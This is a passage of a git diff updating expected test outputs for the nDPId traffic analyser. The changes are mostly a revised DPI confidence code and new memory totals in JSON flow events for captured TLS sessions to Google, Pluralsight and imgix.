00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -247,9 +247,9 @@ ~~ total active/idle flows...: 37/37 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7404844 bytes -~~ total memory freed........: 7404844 bytes -~~ total allocations/frees...: 137110/137110 +~~ total memory allocated....: 7538478 bytes +~~ total memory freed........: 7538478 bytes +~~ total allocations/frees...: 139872/139872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 3224 chars diff --git a/test/results/pluralsight.pcap.out b/test/results/pluralsight.pcap.out index 39ac71f0e..0dcd72f1f 100644 --- a/test/results/pluralsight.pcap.out +++ b/test/results/pluralsight.pcap.out @@ -4,48 +4,48 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648373355763,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355763,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8t1dAAEAGzuTAqAGANkW8EqaSAbs5mmmUAAAAAKAC+vDIPgAAAgQFtAQCCAqK+PnbAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355952,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOAG5js2RbwSwKgBgAG7ppJ9QO7SOZpplaASaN998gAAAgQFtAQCCApSMR4Hivj52wEDAwg="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373355952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5t1lAAEAGzOXAqAGANkW8EqaSAbs5mmmVfUDu04AYAfbrKAAAAQEICor4+pdSMR4HFgMBAgABAAH8AwM1jCFDKADpkwCWNDdgH\/adXVGzDgYuQsQMuim+6yCdjCAuElAWaAcNbYd22pDJpusrU2oMuj5gm\/t2Aky6e512VAAgamoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABQAEgAAD3BsdXJhbHNpZ2h0LmNvbQAXAAD\/AQABAAAKAAoACCoqAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApKioAAQAAHQAgy0tnman9YKIJBU2tFJ\/X+H4+8C285s8hNvU9rt60YmAALQACAQEAKwAHBgoKAwQDAwAbAAMCAAJEaQAFAAMCaDJqagABAAAVAMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357854,"flow_last_seen":1648373357854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357854,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648373357854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357854,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tRVAAEAG8mLAqAGAkks+0KceAbt\/83TdAAAAAKAC+vCjygAAAgQFtAQCCAquLcooAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357861,"flow_last_seen":1648373357861,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357861,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1648373357861,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357861,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85z1AAEAGwDrAqAGAkks+0KcmAbuYBq2TAAAAAKAC+vBS8wAAAgQFtAQCCAquLcouAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357870,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7px6MpPZof\/N03qAS\/\/\/QggAAAgQFTAQCCApC6QiXri3KKAEDAwk="} 01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357870,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5tRdAAEAG8GPAqAGAkks+0KceAbt\/83TejKT2aYAYAfY+HwAAAQEICq4tyjdC6QiXFgMBAgABAAH8AwNByQDZoxI4dOK0Sqz8YqFtpt\/EgjJNogy+qC4qHtET5yBBjqjV\/zD\/ZZYcaXw3kK2L11Av5ASkLtB9CBYWZu3HRgAg2toTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTGhoAAAAAABsAGQAAFnBsdXJhbHNpZ2h0Mi5pbWdpeC5uZXQAFwAA\/wEAAQAACgAKAAh6egAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKXp6AAEAAB0AICyryrnXcbLoAjfLxc89+emszCPBlJNQz9WtPrwFSKZoAC0AAgEBACsABwZ6egMEAwMAGwADAgACRGkABQADAmgySkoAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357879,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7pyYtR\/VLmAatlKAS\/\/8fEgAAAgQFTAQCCAr1hBcPri3KLgEDAwk="} 01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55z9AAEAGvjvAqAGAkks+0KcmAbuYBq2ULUf1TIAYAfb0QgAAAQEICq4tykD1hBcPFgMBAgABAAH8AwMVCkjcl1ldHYszMMhbvCrBmyAv89Ky2j4DTP7XcUyMOSBZfmcNBQmySrBYu\/Xc6jDaJEswZCfnt+SXnGDnGRc5VwAgCgoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABoAGAAAFXBsdXJhbHNpZ2h0LmltZ2l4Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgibFRT+4ffFiWVzdt9+CHYgJvYueRYWReY4H44PP66lMALQACAQEAKwAHBurqAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 